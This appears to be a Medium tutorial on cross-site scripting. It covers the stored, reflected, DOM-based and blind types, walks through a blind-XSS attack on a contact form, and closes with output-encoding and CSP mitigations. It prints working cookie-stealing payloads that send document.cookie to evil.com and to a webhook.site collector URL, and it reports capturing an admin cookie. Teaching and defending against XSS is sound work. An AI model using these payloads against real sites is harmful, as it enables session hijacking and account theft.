XSS (Cross-Site Scripting):

XSS is an attack that exploits Insufficient Input Output Handling flaws within web applications where attacker tries to inject malicious scripts or code into input fields of trusted websites, which was later processed or reflected without any sanitization by the Web application.

Explanation from above image, how attacker execute XSS:

1) Attacker searches for application where XSS injection vulnerability is possible.

2) Attacker then injects his XSS payload which can steal cookie into the application

3) By using these ways attacker exploits the XSS vulnerability and grabs the cookie of the legit user.

How XSS payloads are processed

When we pass any payload to web application it works as shown below

As our web application is not sanitizing and validating inputs, saved payload in the database or being reflect on the webpage.

Types: There are three types of XSS:-

· Stored/Persistent XSS: When an application stores the inputs from any input field,

With-out any validation and includes that un-validated data within its following HTTP responses.

Explain: In stored XSS payload, will be saved into the database and the XSS will be executed whenever any legit user visits.

There is an email field in the application, a malicious user enters XSS payload with his email.

test@gmail.com” ><script>document.location= “http://www.evil.com/?cookie=" + document.cookie</script>

Steps to steal cookies

1. Since the attacker injects payload into email field which is saved in the database without validation.

2. As soon as the legit user visits the page which is rendering this information of without any filtration.

3. The JS Code with the email gets executed and the attacker will get the cookie of the user on his specified domain which is added in document.location.

· Reflected XSS/Non Persistent XSS: Reflected XSS arises when an application’s subsequent HTTP response renders the received input in an unsafe way or in an error message.

Ex: http://www.evil.com/message.php?q=flowers

Parameter q is inserted into the page without validation; an attacker can add a JS payload to execute the XSS.


Loading this page will cause the browser to execute “document.Cookie” and popup will come.

· DOM-Based: DOM-XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client-side script, so that the client-side code runs in an “unexpected” manner.

How it works:

Here is how a DOM-based XSS attack can be performed for this web application:

1. The attacker embeds a malicious script in the

http://www.evil.site/welcome.html#name=<script>alert(document. cookie)</script>

2. The browser starts building the DOM of the page and populates the “document.cookie” property with the URL from step 1.

3. The browser finds the JavaScript code in the HTML body and executes it.

Blind XSS: It is a type of stored XSS where attackers input is saved into the database and is reflected in a totally different application used by system admin/team member (mostly a contact us form). So attacker blindly deploys a series of malicious payloads on web pages that are supposed to be saved in saved in database. But without knowing any details about payloads where they are stored in database or in which webpage they are executed.

Exploit XSS:

Our Aim: We will try to steal the administrator cookie. Value of this contact us form directly goes to the admin. So there are two attribute it is asking while we are submitting the contact us form.

· Title

· Message

We will add the simple payloads in both of the fields. To check whether they are getting rendered without any filtration or not.

Step 1:

Since message is getting reflected I will try to inject very basic JavaScript payload. I am doing this to check whether there is any sanitization, validation or encoding on the inputs before they are getting reflected. So I started <script>alert(document.cookie)</script> payload.

I can see that JS code is getting executed.

Step 2

Now I will try to insert payload which will steal admin cookie

<script>document.write(‘<img src=”https://some.site/123456?cookie=' + document.cookie + ‘“ />’)</script>

But with this payload we need any website which can handle incoming http request with a static IP address. So I here am using “Webhook.site” for this purpose. “Webhook.site” generates a unique URL to test, inspect, forward and script incoming HTTP requests and emails with custom actions. So from “webhook.site” we copy one unique URL.

URL is:


After inserting this URL into script, payload becomes:

<script>document.write(‘<img src=”https://webhook.site/3ec94bb4-d86b-45f8-862d-a59298d4f32b?cookie=' + document.cookie + ‘“ />’)</script>

document.write: Prints the specified text to the page. To print text, enter the text in single quote marks inside parentheses like so: document.write(‘TEST!’);. So it will print TEST.

document.cookie: We used it to read the cookie associated with any user of the website. As soon as the payloads get executed it will add the cookie with the URL and “webhook.site” will receive the request with the cookie.

<script>document.write(‘<img src=”https://webhook.site/3ec94bb4-d86b-45f8-862d-a59298d4f32b/abc?cookie=' + document.cookie + ‘“ />’)</script>

Now we enter this payload into message and we will check, if we have received any incoming request on “webhook.site” or not??

Now upon checking “webhook.site”, You can see we have an incoming HTTP request with the admin cookie.

Preventive Measures /Mitigation:

· Sanitize the output using output encoding. Identify the context where the data is going to reflect and based on that use an escaping approach (HTML/URL/JavaScript etc).

For e.g. when the characters < ” is HTML encoded as &lt; and &quot; it is displayed to user correctly but the browser does not interpret it as the start of an HTML tag or a quote.

· Use the X-XSS-Protection Response header, this header has multiple modes and can be configured as per the business needs.

Additionally, Content Security Policy can also be utilized to render and execute resources retrieved only from certain CDN’s.

Written by

Security enthusiast working to secure web for others https://twitter.com/BoredSecEngg

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store